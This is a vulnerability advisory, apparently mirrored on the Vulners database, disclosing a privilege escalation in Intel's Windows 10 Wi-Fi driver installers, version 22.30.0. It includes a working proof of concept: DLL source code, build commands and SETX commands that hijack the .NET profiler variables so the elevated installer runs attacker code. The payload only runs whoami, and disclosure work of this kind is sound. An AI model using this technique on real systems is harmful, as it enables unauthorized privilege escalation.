Vulners
Lucene search
Windows 10 Wi-Fi Drivers For Intel Wireless Adapters 22.30.0 Privilege Escalation Exploit
Hi @ll,
the executable installers version 22.30.0 (Latest), published 2/23/2021,
for the "Windows® 10 Wi-Fi Drivers for Intel® Wireless Adapters",
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe>
and
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>,
available from
<https://downloadcenter.intel.com/download/30208/Windows-10-Wi-Fi-Drivers-for-Intel-Wireless-Adapters>
are (SURPRISE!) vulnerable: they allow arbitrary code execution WITH
local escalation of privilege.
CVSS 3.0 score: 8.2 (High)
CVSS 3.0 vector: 3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Demonstration:
~~~~~~~~~~~~~~
0. Log on with an arbitrary user account.
1. Save the following source as poc.c in an arbitrary directory:
--- poc.c ---
// Copyright (C) 2004-2021, Stefan Kanthak <[email protected]>
#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
const STARTUPINFO si = {sizeof(si)};
__declspec(safebuffers)
BOOL WINAPI _DllMainCRTStartup(HANDLE hModule,
DWORD dwReason,
CONTEXT *lpContext)
{
WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL";
PROCESS_INFORMATION pi;
#if 0
if (dwReason != DLL_PROCESS_ATTACH)
return FALSE;
#endif
if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE,
CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT,
NULL, NULL, &si, &pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
return TRUE;
}
--- EOF ---
2. Start the command prompt of the 32-bit Windows Software Development Kit,
then run the following command lines to compile poc.c and link it as
poc.dll:
CL.exe /Zl /W4 /Ox /GAFy /c poc.c
LINK.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /OPT:REF /RELEASE /SUBSYSTEM:Windows poc.obj
kernel32.lib
ALTERNATIVE for steps 1 and 2:
2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>
and save it as poc.dll in an arbitrary directory.
See <https://skanthak.homepage.t-online.de/sentinel.html> for its
documentation, and
<https://insights.sei.cmu.edu/cert/2016/06/bypassing-application-whitelisting.html>
for an example how to use it.
3. Logon with the user account created during Windows setup.
4. Download
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe>
and
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>
and save them in an arbitrary directory.
5. Start a command prompt (UNELEVATED!) and run the following command lines
(replace <directory> with the pathname of the directory where you built
or saved poc.dll):
SETX.exe COR_ENABLE_PROFILING 1
SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
SETX.exe COR_PROFILER_PATH <directory>\poc.dll
JFTR: this is just one method to set these environment variables without
the need to elevate!
6. Execute WiFi_22.30.0_Driver32_Win10.exe and WiFi_22.30.0_Driver64_Win10.exe
per double-click, acknowledge the UAC prompt, then admire the console
windows showing the output of WHOAMI.exe running elevated.
stay tuned, and far away from Intel's vulnerable crap!
Stefan Kanthak
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Apr 2021 00:00Current
7.6High risk
Vulners AI Score7.6